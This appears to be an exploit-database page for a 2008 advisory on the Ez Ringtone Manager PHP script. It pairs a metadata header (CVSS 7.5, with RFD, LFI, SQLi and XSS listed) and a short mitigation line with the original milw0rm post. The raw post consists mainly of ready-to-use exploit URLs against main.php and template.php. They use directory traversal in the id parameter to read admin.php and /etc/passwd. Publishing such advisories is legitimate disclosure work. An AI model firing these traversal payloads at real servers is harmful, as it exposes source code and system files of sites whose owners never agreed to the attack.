Ez Ringtone Manager Multiple Vulnerabilities

vendor:

Ez Ringtone Manager

by:

b3hz4d

7.5

CVSS

HIGH

Remote File Disclosure, Local File Inclusion, SQL Injection, XSS

22, 98, 89, 79

CWE

Product Name: Ez Ringtone Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Ez Ringtone Manager Multiple Vulnerabilities

The Ez Ringtone Manager application is vulnerable to Remote File Disclosure, Local File Inclusion, SQL Injection, and XSS. An attacker can exploit these vulnerabilities by sending crafted requests to the application. For example, an attacker can send a request to the main.php or template.php file with a malicious parameter value to exploit the vulnerabilities.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in the application. Additionally, developers should ensure that the application is not vulnerable to any other type of attack.

Source

Exploit-DB raw data:

        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +            Ez Ringtone Manager Multiple Vulnerabilities            +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 22 nov 2008
SITE   : WwW.DeltaHacking.Net


#####################################################

APPLICATION  : Ez Ringtone Manager
DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143
VENDOR       : http://www.scriptsez.net/
DEMO         : http://demo.scriptsez.net/ringtones/demo.html

#####################################################


[+] vuln    : ./main.php
              ./template.php


               vulnerability is in main.php that included in template.php


[1] Remote File Disclosure:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php
              http://victim.com/ringtones/template.php?action=detail&id=../admin.php

[2] Local File Inclusion:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
              http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd

##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com #

##########################################################################################################

# milw0rm.com [2008-11-22]